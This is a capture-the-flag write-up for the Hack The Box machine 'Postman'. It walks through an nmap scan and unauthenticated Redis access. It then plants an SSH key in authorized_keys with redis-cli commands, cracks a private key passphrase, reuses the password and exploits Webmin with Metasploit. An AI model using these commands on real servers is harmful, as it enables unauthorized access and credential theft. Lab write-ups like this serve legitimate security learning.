Let’s get started!

Level: medium


This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -oN postman

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Following the indications in ​ Pentesting Redis of the book HackTricks​ I try to connect to redis
without credentials (and it worked!) and I extract some information from the service.
The most interesting information ​ was the path of the .ssh folder of the user redis inside
the box​ :

COMMAND: redis-cli -h

After checking all i found the path to ssh folder.

Knowing this path and following the indications in ​ Pentesting Redis of the book HackTricks​ I
created a new ssh key, uploaded the public key to the authorized_keys files and ​ login via
ssh using the redis user​ :

Generate ssh key pair with ssh-keygen.

COMMAND: ssh-keygen

(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > foo.txt  

Adding 2 lines before and after the public key will ensure that it is parsed correctly.
cat foo.txt | redis-cli -h -x set crackit


redis-cli -h> config set dir /var/lib/redis/.ssh
OK> config set dbfilename “authorized_keys”
OK> save
OK> quit

Let’s connect to ssh.

Then, once inside the machine I enumerated it using the script ​ linpeas from the Suite PEAS​ .
This script found one interesting file:

Which turns out that could be the private ssh key of the user Matt

After downloading, extracting the hash from the key in john format and cracking it, you can
find that the password used to encrypt the key is ​ computer2008

But if you try to login inside Matts account via ssh using the extracted ssh_key with that
password you won’t be able to login. This is because it is not the current private ssh key of
Matt. But the ​ computer2008 ​ its Matts password, so you can su into Matts.


If you try to login inside the ​ https://Postman:10000​ service using the ​ discovered
credentials (​ Matt : computer2008​ ) you will see that ​ they are working​ !
Then, knowing some valid credentials and knowing the version of the running software

We can exploit a well known vulnerability of this version of the service:
So just exploit it using the ​ metasploit module​ . To do so, set the ​ password​ , ​ username
rhosts​ , and ​ ssl (to true)​

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r


Please enter your comment!
Please enter your name here